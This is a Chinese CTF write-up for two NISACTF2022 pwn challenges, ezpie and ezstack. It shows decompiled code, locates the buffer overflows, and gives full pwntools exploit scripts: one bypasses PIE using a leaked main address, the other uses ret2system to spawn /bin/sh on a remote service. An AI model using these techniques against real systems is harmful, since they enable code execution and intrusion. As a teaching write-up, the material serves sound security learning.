pwn - write ups
作者:互联网
[NISACTF2022]ezpie
- checksec
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
OHHH!,give you a gift!
0x56573770
Input:
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
puts("OHHH!,give you a gift!");
printf("%p\n", main);
puts("Input:");
vuln();
return 0;
}
- vuln
ssize_t vuln()
{
char buf; // [esp+0h] [ebp-28h]
return read(0, &buf, 0x50u);
}
vuln()有溢出
已知程序会输出main地址
程序main函数地址为00000770,则
main_addr = int(io.recvline(),16)
offset = main_addr - main_add
接收程序输出的main函数地址,减去静态地址算出offset
- shell
int shell()
{
return system("/bin/sh");
}
获取shell地址
bin_sh = elf.sym['shell']
加上offset,得bin_sh_final
bin_sh_final = offset + bin_sh
完整exp
from pwn import *
context(os = 'linux' , arch = 'i386' , log_level = 'debug')
content = 0
if content == 0:
io = remote('124.221.24.137',28638)
else:
io = process('')
def atk():
elf = ELF('')
padlength = 0x28 +0x4
bin_sh = elf.sym['shell']
io.recvuntil('OHHH!,give you a gift!\n')
main_addr = int(io.recvline(),16)
success('[+]main_addr=' + hex(main_addr))
main_add = elf.sym['main']
offset = main_addr - main_add
success('[+]offset=' + hex(offset))
io.recvuntil('Input:\n')
success('[+]bin_sh=' + hex(bin_sh))
bin_sh_final = offset + bin_sh
success('[+]bin_sh_final='+hex(bin_sh_final))
payload = b'a' * padlength + p64(bin_sh_final)
io.sendline(payload)
io.interactive()
[NISACTF2022]ezstack
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0);
setbuf(stdout, 0);
shell();
return 0;
}
- shell
ssize_t shell()
{
char buf; // [esp+0h] [ebp-48h]
system("echo Welcome to NISACTF");
return read(0, &buf, 0x60u);
}
shell函数处有溢出
完整exp
from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()
标签:bin,shell,elf,write,sh,io,pwn,main,ups 来源: https://www.cnblogs.com/M1sceden4/p/16240907.html